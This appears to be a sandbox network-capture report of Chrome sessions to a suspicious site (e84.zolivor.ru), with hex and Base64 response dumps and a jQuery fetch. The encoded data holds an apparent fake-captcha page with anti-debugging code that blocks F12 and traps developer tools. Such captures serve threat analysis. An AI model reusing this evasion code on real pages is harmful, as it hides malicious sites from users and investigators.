                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 67 49 43 42 6d 62 47 56 34 4c 57 52 70 63 6d 56 6a 64 47 6c 76 62 6a 6f 67 59 32 39 73 64 57 31 75 4f 77 30 4b 49 43 41 67 49 47 46 73 61 57 64 75 4c 57 6c 30 5a 57 31 7a 4f 69 42 6a 5a 57 35 30 5a 58 49 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57
                                                                                        Data Ascii: gICBmbGV4LWRpcmVjdGlvbjogY29sdW1uOw0KICAgIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogICAgd2lkdGg6IDEwMCU7DQogICAgbWFyZ2luLXRvcDogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f
                                                                                        Data Ascii: dGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQo
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 78 35 5a 6d 78 4e 56 57 4a 4b 59 58 51 67 50 53 41 78 4d 44 41 37 44 51 6f 67 49 43 41 67 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 46 64 42 65 6d 46 49 63 57 4e 77 54 57 77 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 70 4e 57 6e 42 45 51 31 68 53 65 45 77 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 45 70 4e 57 6e 42 45 51 31 68 53
                                                                                        Data Ascii: CAgIGNvbnN0IGx5ZmxNVWJKYXQgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IFdBemFIcWNwTWwgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IEpNWnBEQ1hSeEwgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKEpNWnBEQ1hS
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 78 70 62 57 63 67 63 33 4a 6a 50 53 4a 6b 59 58 52 68 4f 6d 6c 74 59 57 64 6c 4c 33 42 75 5a 7a 74 69 59 58 4e 6c 4e 6a 51 73 61 56 5a 43 54 31 4a 33 4d 45 74 48 5a 32 39 42 51 55 46 42 54 6c 4e 56 61 45 56 56 5a 30 46 42 51 56 6c 42 51 55 46 42 52 30 46 44 51 55 31 42 51 55 46 44 56 45 64 56 56 30 35 42 51 55 46 42 53 55 64 4f 53 56 56 72 4d 45 46 42 53 47 39 74 51 55 46 44 51 57 68 42 51 55 45 72 5a 30 46 42 51 55 6c 45 62 30 46 42 51 6a 46 4e 51 55 46 42 4e 6d 31 42 51 55 46 45 63 56 6c 42 51 55 46 59 59 30 70 35 4e 6c 56 55 64 30 46 42 51 55 5a 34 56 55 56 34 56 56 4a 52 51 55 46 42 54 44 68 6e 53 56 41 72 4c 30 46 4e 54 57 74 49 54 56 56 70 53 48 4e 56 61 6b 6c 4e 56 57 6c 49 4f 46 56 70 53 44 68 56 61 6b 67 34 57 57 70 49 4f 45 31 70 53 48 5a 35 4f
                                                                                        Data Ascii: xpbWcgc3JjPSJkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQVlBQUFBR0FDQU1BQUFDVEdVV05BQUFBSUdOSVVrMEFBSG9tQUFDQWhBQUErZ0FBQUlEb0FBQjFNQUFBNm1BQUFEcVlBQUFYY0p5NlVUd0FBQUZ4VUV4VVJRQUFBTDhnSVArL0FNTWtITVVpSHNVaklNVWlIOFVpSDhVakg4WWpIOE1pSHZ5O
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 33 5a 43 73 32 64 55 51 31 65 53 39 6a 53 48 55 31 51 7a 4e 6d 5a 6d 4d 76 52 57 4e 4a 57 6d 4a 69 64 69 39 6d 55 7a 56 52 4c 32 56 6b 4e 32 70 6a 5a 6c 46 6c 57 45 77 78 4d 48 68 6c 56 31 68 32 63 6e 4a 32 64 6e 59 33 4d 6a 63 34 65 47 4d 76 4e 56 41 79 4e 7a 6b 35 4e 6c 5a 78 64 32 56 49 57 6a 4e 69 64 7a 52 52 5a 44 42 59 4e 57 78 6d 4c 7a 4e 69 55 48 70 75 4c 32 74 74 64 6d 4e 4f 4c 30 78 61 4c 33 46 6c 55 44 5a 74 64 31 6f 32 65 69 74 33 4f 57 56 51 4c 33 52 6e 56 6a 4d 30 59 55 74 4e 53 6a 6c 78 4f 53 73 33 53 45 4a 6e 4d 54 59 76 63 57 5a 42 64 30 4d 31 4d 54 68 74 5a 55 35 45 4e 30 5a 6e 4e 45 78 75 53 43 74 57 55 55 39 48 5a 47 4e 34 4f 46 42 75 57 43 74 61 4e 45 4a 51 5a 54 6c 34 61 44 64 57 65 6a 52 61 54 33 59 34 65 58 64 68 5a 55 56 36 4b 33
                                                                                        Data Ascii: 3ZCs2dUQ1eS9jSHU1QzNmZmMvRWNJWmJidi9mUzVRL2VkN2pjZlFlWEwxMHhlV1h2cnJ2dnY3Mjc4eGMvNVAyNzk5NlZxd2VIWjNidzRRZDBYNWxmLzNiUHpuL2ttdmNOL0xaL3FlUDZtd1o2eit3OWVQL3RnVjM0YUtNSjlxOSs3SEJnMTYvcWZBd0M1MThtZU5EN0ZnNExuSCtWUU9HZGN4OFBuWCtaNEJQZTl4aDdWejRaT3Y4eXdhZUV6K3
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 4d 45 46 43 5a 33 70 73 4f 45 35 4f 64 30 46 48 4d 6b 63 34 64 6d 68 77 54 32 39 42 63 56 45 31 62 6a 68 31 51 56 51 30 4e 6a 6b 34 53 30 4e 68 52 45 6c 56 51 7a 51 76 4b 32 64 49 5a 57 5a 54 4c 7a 52 70 65 6a 4d 72 4b 33 6f 34 53 30 4e 68 52 45 5a 56 52 44 51 76 4e 6d 64 49 4b 79 74 68 4f 44 63 30 55 55 52 49 4c 79 38 31 55 45 74 52 52 6c 56 48 51 6b 78 33 62 33 67 7a 5a 33 59 76 4b 7a 64 46 65 46 42 6e 4b 30 5a 70 56 45 6c 6b 53 48 5a 59 62 30 56 6f 51 31 51 72 4e 6b 46 6b 4e 54 6b 33 4f 44 5a 6b 65 55 46 44 59 55 52 4e 62 43 73 72 4d 55 74 48 57 6c 42 35 62 30 4a 77 61 6e 70 46 65 44 6c 42 61 31 4e 49 63 45 46 56 55 55 31 44 5a 6d 35 53 52 45 78 45 5a 30 70 35 52 30 46 49 61 31 42 70 51 33 64 6e 57 57 74 32 53 32 70 47 4d 6b 52 47 56 44 46 4a 51 55 78
                                                                                        Data Ascii: MEFCZ3psOE5Od0FHMkc4dmhwT29BcVE1bjh1QVQ0Njk4S0NhRElVQzQvK2dIZWZTLzRpejMrK3o4S0NhREZVRDQvNmdIKythODc0UURILy81UEtRRlVHQkx3b3gzZ3YvKzdFeFBnK0ZpVElkSHZYb0VoQ1QrNkFkNTk3ODZkeUFDYURNbCsrMUtHWlB5b0JwanpFeDlBa1NIcEFVUU1DZm5SRExEZ0p5R0FIa1BpQ3dnWWt2S2pGMkRGVDFJQUx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.450055151.101.2.1374434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:20:09 UTC620OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://e84.zolivor.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:20:09 UTC612INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 89501
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-15d9d"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 512936
                                                                                        Date: Tue, 24 Dec 2024 08:20:09 GMT
                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740029-EWR
                                                                                        X-Cache: HIT, HIT
                                                                                        X-Cache-Hits: 2774, 0
                                                                                        X-Timer: S1735028410.667877,VS0,VE0
                                                                                        Vary: Accept-Encoding
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                        2024-12-24 08:20:09 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.450047104.21.112.14434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:20:10 UTC1312OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: e84.zolivor.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://e84.zolivor.ru/OSkl/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
